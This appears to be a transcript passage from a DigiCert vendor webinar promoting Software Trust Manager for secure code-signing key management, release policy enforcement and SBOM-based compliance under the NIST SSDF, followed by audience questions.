And if we look at what Software Trust Manager does in a bit more detail, we think of it in terms of three pillars of functionality: one is enterprise secure code signing, the second is enterprise software security, and the third is enterprise software transparency. From a secure code signing standpoint, code signing is a great technique, and NIST calls it out. But if you don't protect the assets needed by the code signing infrastructure, it's easy for an attacker to compromise that infrastructure, and then it's no longer useful. DigiCert is well known for its trusted public code signing certificates. We provide the ability to store all your private code signing keys in secure, FIPS 140-2 compliant storage, and then we automate the key management and certificate management for all of your developers. Another source of problems is that developers don't always know the best practices for managing their certificates and keys. From an enterprise security standpoint, we give that small team of security professionals the power to have visibility across the entire enterprise, no matter what toolsets the development teams are using or where they're physically located. They have a single pane of glass to see all the security artifacts that are created as part of the build process. They also have the ability to define "this is what our security policy is": they can take that Word document containing the security policy and put it into a tool that can automatically enforce it across the organization. If they want a policy that says every time you do a software release you have to run a threat and malware scan, that can just be part of the process, integrated into the platform. And then they define what's needed for a release.
These are all the things you have to do, your checklist of things that need to be done for a software release, and then you can automatically enforce that all those things are indeed done, so a development team can't just decide not to do them. And then finally, around enterprise software transparency, we provide the enterprise visibility that's really needed for compliance, both internal compliance and regulatory compliance. It's the set of logs that will help you remediate any issues that happen downstream: a log of all the activities and the signatures that got generated, plus the software bill of materials generated for every software release. And it's irrefutable, a record of what's happened, so it becomes the evidence you often need for compliance. By using Software Trust Manager, organizations are going to protect themselves from software supply chain attacks. They're going to reduce the risk of releasing compromised software. They're going to drastically increase the efficiency of not only their software teams but their PKI team, their security teams, and their compliance teams. And the great thing about Software Trust Manager is that it works across many different kinds of software development environments, programming languages, and types of software, from embedded software to enterprise software to cloud-native software. It doesn't really matter what platform. After the webinar, I believe we're going to send out an asset that maps the capabilities in Software Trust Manager to the best practices in the NIST framework, and that will help you understand how DigiCert can help you achieve those NIST best practices. And with that, I just want to thank everyone for your time. I'm going to switch over to the question window and see if any questions have come in.
And I know I talk kind of fast, but I get excited about this stuff. So thank you very much for your attention. Thank you, Maddie. We had a couple of great questions come in. To start off, from Steven: how does this version, SSDF 1.1, relate to the new NIST 2.0? We have not dived into that yet, but it's going to be an iteration on 1.1. So 1.1 is what we've been working toward, but I know that 2.0 is in development. Great. And kind of building off of that: do you think this NIST framework is the best framework we should be following? You know, that's a good question. I like it because it's general. I talk to lots of different industries, and I would say the best framework is the one specified by your industry, if there's a regulatory agency that regulates your industry. But I like this one because I can talk about a broad set of topics that generally applies to everyone. Great. This one here: with SBOM analysis, do you identify libraries that are internal to the organization's software, not off-the-shelf or open source? It's both. Our binary static analysis will look at the final binary image, and it will identify software that was developed internally. It will also identify software components that have come from external sources, be those open source software or third-party commercial libraries. Great. All right, we just have a couple more here. Our developers are already code signing; tell us a little bit more about how the solution improves what they already do. Okay, that's a good question and one that I get asked a lot. I mentioned a few minutes ago that code signing is really effective as long as your code signing infrastructure isn't compromised. So what could compromise it? One is that the private code signing keys, the secrets, are no longer secret. That's what happened with the MSI breach last year.
And developers frequently don't appreciate the seriousness of the consequences if those private code signing keys become compromised. So what do they end up doing? They put the keys in places that are convenient for them to access: on a build machine, on a laptop, up in the cloud, and in some cases they've even put them into a source code repository that gets uploaded to GitHub, and then everyone has visibility into them. So even though the act of code signing is secure, they've compromised the infrastructure around code signing. When DigiCert talks about secure code signing, we're talking about securing that infrastructure. That means doing a couple of things. One is making sure the keys are secure and can't be accessed by people who aren't authorized to access them. We can secure the keys based on which roles and responsibilities have access, and even require someone to approve before a key can actually be used. We can ensure that if there's a policy that only certain kinds of certificates or only a certain key configuration, say a particular encryption strength, can be used, that policy is enforced. I know PQC comes up a lot as something in the future; by having a secure code signing infrastructure in place, making the transition from regular code signing certificates to PQC-enabled certificates becomes much easier, because you have the infrastructure in place to help that happen. Excellent. All right, I think we have time for one more question. How does secure code signing differ from Azure Key Vault? Azure Key Vault is designed for storing secrets, but it doesn't necessarily provide the infrastructure to control when that code signing key can be accessed and how it can be accessed, by whom, where, and when. These are all important aspects of ensuring that the code signing infrastructure itself is secure.
So Azure Key Vault will definitely secure a key, but if you don't have control over who has access to that key within Azure Key Vault, then your infrastructure for accessing that key is no longer secure, and compromise can occur. When we talk about secure code signing, we're talking about having an infrastructure in place that controls who has access, who needs to approve that access, the configuration of the keys and the certificates, where the certificates come from, the time of day they can be accessed, things like that. That's what we mean, and it's really about making the infrastructure around code signing robust, versus just taking a private key and signing an artifact. Excellent. Thank you, Maddie. Thanks everyone for joining us today. I hope you learned a little something in today's webinar. We'll launch a survey now; if you have any questions or comments that didn't get addressed, or if you'd like to see a specific topic in the future, we'd love to hear about it. Again, we'll be sending out the recording after the webinar, and we will also be sending out the NIST matrix that we're putting together for you. So please stay tuned for that, and thanks again for joining us. Talk to you soon. Thank you, everyone.